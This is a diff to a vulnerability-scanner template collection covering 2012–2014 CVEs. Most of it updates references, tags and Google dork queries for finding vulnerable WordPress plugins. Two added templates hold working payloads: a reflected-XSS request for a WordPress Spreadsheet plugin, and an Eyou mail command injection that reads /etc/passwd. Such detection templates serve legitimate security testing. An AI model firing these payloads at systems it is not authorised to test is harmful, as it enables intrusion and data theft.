- to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg
- parameter to /app/view/save_successful.php.
+ description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+ - https://web.archive.org/web/20151001133311/http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html
+ - http://web.archive.org/web/20210615141436/https://www.securityfocus.com/bid/52986
+ - https://www.htbridge.com/advisory/HTB23082
classification:
cve-id: CVE-2012-1835
+ metadata:
+ google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml
index 7c3e948821..5cf4afa804 100644
--- a/cves/2012/CVE-2012-2371.yaml
+++ b/cves/2012/CVE-2012-2371.yaml
@@ -1,15 +1,18 @@
id: CVE-2012-2371
info:
- name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
+ name: WP-FaceThumb 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-2371
+ - http://web.archive.org/web/20140805090129/http://secunia.com/advisories/49143/
+ - http://www.openwall.com/lists/oss-security/2012/05/15/12
+ - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html
classification:
cve-id: CVE-2012-2371
- tags: cve,cve2012,wordpress,xss,wp-plugin
+ tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml
index e28f47c522..1e32c940bf 100644
--- a/cves/2012/CVE-2012-3153.yaml
+++ b/cves/2012/CVE-2012-3153.yaml
@@ -12,9 +12,10 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
- https://www.oracle.com/security-alerts/cpuoct2012.html
+ - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
classification:
cve-id: CVE-2012-3153
- tags: cve,cve2012,oracle,rce
+ tags: cve,cve2012,oracle,rce,edb
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml
index 43bc9b456a..75a75271c1 100644
--- a/cves/2012/CVE-2012-4242.yaml
+++ b/cves/2012/CVE-2012-4242.yaml
@@ -1,12 +1,14 @@
id: CVE-2012-4242
info:
- name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting
+ name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4242
+ - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html
+ - http://web.archive.org/web/20210121230717/https://www.securityfocus.com/bid/55622/
classification:
cve-id: CVE-2012-4242
tags: cve,cve2012,wordpress,xss,wp-plugin
diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml
index b085d1ae97..c2b2313f25 100644
--- a/cves/2012/CVE-2012-4253.yaml
+++ b/cves/2012/CVE-2012-4253.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
+ - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286
classification:
cve-id: CVE-2012-4253
- tags: cve,cve2012,lfi
+ tags: packetstorm,cve,cve2012,lfi,edb
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml
index 2cbe9c386a..8143853716 100644
--- a/cves/2012/CVE-2012-4273.yaml
+++ b/cves/2012/CVE-2012-4273.yaml
@@ -1,15 +1,20 @@
id: CVE-2012-4273
info:
- name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting
+ name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4273
+ - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798
+ - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/
+ - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html
classification:
cve-id: CVE-2012-4273
- tags: cve,cve2012,wordpress,xss,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
+ tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4547.yaml b/cves/2012/CVE-2012-4547.yaml
index ff59b1ea3f..d156aed493 100644
--- a/cves/2012/CVE-2012-4547.yaml
+++ b/cves/2012/CVE-2012-4547.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/36164
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
+ - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+ - http://openwall.com/lists/oss-security/2012/10/29/7
classification:
cve-id: CVE-2012-4547
- tags: cve,cve2020,xss,awstats
+ tags: cve,cve2012,xss,awstats,edb
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml
index 899cdd00eb..0e320533e6 100644
--- a/cves/2012/CVE-2012-4768.yaml
+++ b/cves/2012/CVE-2012-4768.yaml
@@ -1,15 +1,17 @@
id: CVE-2012-4768
info:
- name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
+ name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4768
+ - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt
+ - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
classification:
cve-id: CVE-2012-4768
- tags: cve,cve2012,wordpress,xss,wp-plugin
+ tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml
index 341d0052d1..b4dcf437f8 100644
--- a/cves/2012/CVE-2012-4878.yaml
+++ b/cves/2012/CVE-2012-4878.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878
+ - http://www.vulnerability-lab.com/get_content.php?id=487
+ - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html
classification:
cve-id: CVE-2012-4878
- tags: cve,cve2012,lfi,traversal
+ tags: cve2012,lfi,traversal,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml
index 529af08dce..2162408cda 100644
--- a/cves/2012/CVE-2012-4889.yaml
+++ b/cves/2012/CVE-2012-4889.yaml
@@ -1,16 +1,18 @@
id: CVE-2012-4889
info:
- name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting
+ name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference:
- - https://www.securityfocus.com/bid/52841/info
+ - http://web.archive.org/web/20210121082432/https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
+ - http://packetstormsecurity.org/files/111474/VL-437.txt
+ - http://www.vulnerability-lab.com/get_content.php?id=437
classification:
cve-id: CVE-2012-4889
- tags: cve,cve2012,xss,manageengine
+ tags: cve,cve2012,xss,manageengine,packetstorm
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml
index 419d1fad47..2b05afdf8a 100644
--- a/cves/2012/CVE-2012-4940.yaml
+++ b/cves/2012/CVE-2012-4940.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/37996
- https://nvd.nist.gov/vuln/detail/CVE-2012-4940
+ - http://www.kb.cert.org/vuls/id/586556
+ - http://web.archive.org/web/20210121232008/https://www.securityfocus.com/bid/56343/
classification:
cve-id: CVE-2012-4940
- tags: cve,cve2012,axigen,lfi,mail
+ tags: edb,cve,cve2012,axigen,lfi,mail
requests:
- method: GET
diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml
index 440c59b114..d4fe46fa32 100644
--- a/cves/2012/CVE-2012-5913.yaml
+++ b/cves/2012/CVE-2012-5913.yaml
@@ -1,16 +1,18 @@
id: CVE-2012-5913
info:
- name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
+ name: WordPress Integrator 1.32 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-5913
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
+ - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html
+ - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
classification:
cve-id: CVE-2012-5913
- tags: cve,cve2012,wordpress,xss,wp-plugin
+ tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml
index e682fde510..a487bd900a 100644
--- a/cves/2013/CVE-2013-1965.yaml
+++ b/cves/2013/CVE-2013-1965.yaml
@@ -8,9 +8,10 @@ info:
reference:
- http://struts.apache.org/development/2.x/docs/s2-012.html
- https://nvd.nist.gov/vuln/detail/CVE-2013-1965
+ - https://bugzilla.redhat.com/show_bug.cgi?id=967655
+ remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
classification:
cve-id: CVE-2013-1965
- remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
tags: cve,cve2013,apache,rce,struts,ognl
requests:
diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml
index 94f2efcab6..49e8789f61 100644
--- a/cves/2013/CVE-2013-2248.yaml
+++ b/cves/2013/CVE-2013-2248.yaml
@@ -9,20 +9,21 @@ info:
- https://www.exploit-db.com/exploits/38666
- https://nvd.nist.gov/vuln/detail/CVE-2013-2248
- https://cwiki.apache.org/confluence/display/WW/S2-017
+ - http://struts.apache.org/release/2.3.x/docs/s2-017.html
+ remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
classification:
cve-id: CVE-2013-2248
- remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
- tags: cve,cve2013,apache,redirect,struts
+ tags: cve,cve2013,apache,redirect,struts,edb
requests:
- method: GET
path:
- - "{{BaseURL}}/index.action?redirect:http://www.example.com/"
+ - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/02/21
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index 4e89d8d270..c310535f2c 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -9,10 +9,10 @@ info:
- http://struts.apache.org/release/2.3.x/docs/s2-016.html
- https://cwiki.apache.org/confluence/display/WW/S2-016
- https://nvd.nist.gov/vuln/detail/CVE-2013-2251
+ remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
classification:
cve-id: CVE-2013-2251
- remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
- tags: cve,cve2013,rce,struts,apache,ognl
+ tags: cve,cve2013,rce,struts,apache,ognl,kev
requests:
- raw:
diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml
index fc159e010f..bb925ae363 100644
--- a/cves/2013/CVE-2013-2287.yaml
+++ b/cves/2013/CVE-2013-2287.yaml
@@ -1,14 +1,17 @@
id: CVE-2013-2287
info:
- name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
+ name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+ - https://www.dognaedis.com/vulns/DGS-SEC-16.html
classification:
cve-id: CVE-2013-2287
+ metadata:
+ google-query: inurl:"/wp-content/plugins/uploader"
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml
index 0448bfb7f8..3e3a9b5aa2 100644
--- a/cves/2013/CVE-2013-3526.yaml
+++ b/cves/2013/CVE-2013-3526.yaml
@@ -1,15 +1,19 @@
id: CVE-2013-3526
info:
- name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
+ name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+ - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html
+ - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/
classification:
cve-id: CVE-2013-3526
- tags: cve,cve2013,wordpress,xss,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/trafficanalyzer"
+ tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml
index 03525d58c2..055959122f 100644
--- a/cves/2013/CVE-2013-3827.yaml
+++ b/cves/2013/CVE-2013-3827.yaml
@@ -4,16 +4,15 @@ info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
- description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0,
- and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web
- Container.
+ description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
+ - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
classification:
cve-id: CVE-2013-3827
- tags: cve,cve2013,lfi,javafaces,oracle
+ tags: edb,cve,cve2013,lfi,javafaces,oracle
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml
index 85e072ed31..1d687a148e 100644
--- a/cves/2013/CVE-2013-4117.yaml
+++ b/cves/2013/CVE-2013-4117.yaml
@@ -1,15 +1,19 @@
id: CVE-2013-4117
info:
- name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
+ name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4117
+ - http://openwall.com/lists/oss-security/2013/07/11/11
+ - http://seclists.org/bugtraq/2013/Jul/17
classification:
cve-id: CVE-2013-4117
- tags: cve,cve2013,wordpress,xss,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
+ tags: cve2013,wordpress,xss,wp-plugin,seclists,cve
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml
index 9cc9de7e45..db3dc3261f 100644
--- a/cves/2013/CVE-2013-4625.yaml
+++ b/cves/2013/CVE-2013-4625.yaml
@@ -1,17 +1,21 @@
id: CVE-2013-4625
info:
- name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
+ name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
+ - https://seclists.org/bugtraq/2013/Jul/160
+ - https://www.htbridge.com/advisory/HTB23162
+ remediation: Upgrade to Duplicator 0.4.5 or later.
classification:
cve-id: CVE-2013-4625
- remediation: Upgrade to Duplicator 0.4.5 or later.
- tags: cve,cve2013,wordpress,xss,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/duplicator"
+ tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-5528.yaml b/cves/2013/CVE-2013-5528.yaml
index cd71081988..ce41d2e418 100644
--- a/cves/2013/CVE-2013-5528.yaml
+++ b/cves/2013/CVE-2013-5528.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
+ - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
+ - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/
classification:
cve-id: CVE-2013-5528
- tags: cve,cve2013,lfi,cisco
+ tags: cve,cve2013,lfi,cisco,edb
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-5979.yaml b/cves/2013/CVE-2013-5979.yaml
index 7ad29aa3ce..cdf9722925 100644
--- a/cves/2013/CVE-2013-5979.yaml
+++ b/cves/2013/CVE-2013-5979.yaml
@@ -8,11 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/26955
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
- - https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
classification:
cve-id: CVE-2013-5979
- tags: cve,cve2013,lfi
+ tags: cve,cve2013,lfi,edb
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-6281.yaml b/cves/2013/CVE-2013-6281.yaml
new file mode 100644
index 0000000000..2f67a808c3
--- /dev/null
+++ b/cves/2013/CVE-2013-6281.yaml
@@ -0,0 +1,49 @@
+id: CVE-2013-6281
+
+info:
+ name: WordPress Spreadsheet - Cross-Site Scripting
+ author: random-robbie
+ severity: medium
+ description: |
+ WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.
+ reference:
+ - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+ - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
+ - https://wordpress.org/plugins/dhtmlxspreadsheet/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-6281
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2013-6281
+ cwe-id: CWE-79
+ metadata:
+ google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
+ verified: "true"
+ tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - raw:
+ - |
+ GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "page: ''"
+ - "dhx_rel_path"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2013/CVE-2013-7091.yaml b/cves/2013/CVE-2013-7091.yaml
index 2a81348200..4b85478df5 100644
--- a/cves/2013/CVE-2013-7091.yaml
+++ b/cves/2013/CVE-2013-7091.yaml
@@ -9,9 +9,10 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
- https://www.exploit-db.com/exploits/30085
- https://www.exploit-db.com/exploits/30472
+ - http://www.exploit-db.com/exploits/30085
classification:
cve-id: CVE-2013-7091
- tags: cve,cve2013,zimbra,lfi
+ tags: zimbra,lfi,edb,cve,cve2013
requests:
- method: GET
diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml
index f19be60b3e..50edd26a43 100644
--- a/cves/2013/CVE-2013-7240.yaml
+++ b/cves/2013/CVE-2013-7240.yaml
@@ -9,12 +9,15 @@ info:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
- https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
+ - http://seclists.org/oss-sec/2013/q4/570
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22
- tags: cve,cve2013,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/advanced-dewplayer/"
+ tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-10037.yaml b/cves/2014/CVE-2014-10037.yaml
index fc7bb4f818..2dc322050b 100644
--- a/cves/2014/CVE-2014-10037.yaml
+++ b/cves/2014/CVE-2014-10037.yaml
@@ -7,11 +7,11 @@ info:
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- - https://www.cvedetails.com/cve/CVE-2014-10037
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
+ - http://www.exploit-db.com/exploits/30865
classification:
cve-id: CVE-2014-10037
- tags: cve,cve2014,lfi
+ tags: cve,cve2014,lfi,edb
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-1203.yaml b/cves/2014/CVE-2014-1203.yaml
new file mode 100644
index 0000000000..d8e32964a8
--- /dev/null
+++ b/cves/2014/CVE-2014-1203.yaml
@@ -0,0 +1,39 @@
+id: CVE-2014-1203
+
+info:
+ name: Eyou E-Mail <3.6 - Remote Code Execution
+ author: pikpikcu
+ severity: critical
+ description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.
+ reference:
+ - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-1203
+ - http://seclists.org/fulldisclosure/2014/Jan/32
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2014-1203
+ cwe-id: CWE-77
+ tags: seclists,rce,eyou
+
+requests:
+ - raw:
+ - |
+ POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ type='|cat /etc/passwd||'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/01
diff --git a/cves/2014/CVE-2014-2321.yaml b/cves/2014/CVE-2014-2321.yaml
index 7040319972..7f328db084 100644
--- a/cves/2014/CVE-2014-2321.yaml
+++ b/cves/2014/CVE-2014-2321.yaml
@@ -10,6 +10,7 @@ info:
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
- https://nvd.nist.gov/vuln/detail/CVE-2014-2321
+ - http://www.kb.cert.org/vuls/id/600724
classification:
cve-id: CVE-2014-2321
tags: iot,cve,cve2014,zte
diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml
index e65288f75d..8b91e28223 100644
--- a/cves/2014/CVE-2014-2323.yaml
+++ b/cves/2014/CVE-2014-2323.yaml
@@ -9,12 +9,13 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2323
- https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
- http://www.lighttpd.net/2014/3/12/1.4.35/
+ - http://seclists.org/oss-sec/2014/q1/561
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-2323
cwe-id: CWE-89
- tags: cve,cve2014,sqli,lighttpd,injection
+ tags: lighttpd,injection,seclists,cve,cve2014,sqli
requests:
- raw:
diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml
index 901cc9a100..8ca6ae1010 100644
--- a/cves/2014/CVE-2014-2383.yaml
+++ b/cves/2014/CVE-2014-2383.yaml
@@ -1,31 +1,45 @@
id: CVE-2014-2383
info:
- name: Arbitrary file read in dompdf < v0.6.0
- author: 0x_Akoko
+ name: Dompdf < v0.6.0 - Local File Inclusion
+ author: 0x_Akoko,akincibor,ritikchaddha
severity: high
- description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
+ description: |
+ A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
- https://www.exploit-db.com/exploits/33004
+ - http://seclists.org/fulldisclosure/2014/Apr/258
+ - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
+ - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
classification:
cve-id: CVE-2014-2383
metadata:
- win-payload: /dompdf.php?input_file=C:/windows/win.ini
- unix-payload: /dompdf.php?input_file=/etc/passwd
- tags: cve,cve2014,dompdf,lfi
+ verified: "true"
+ tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists
requests:
- method: GET
path:
- - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
- - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
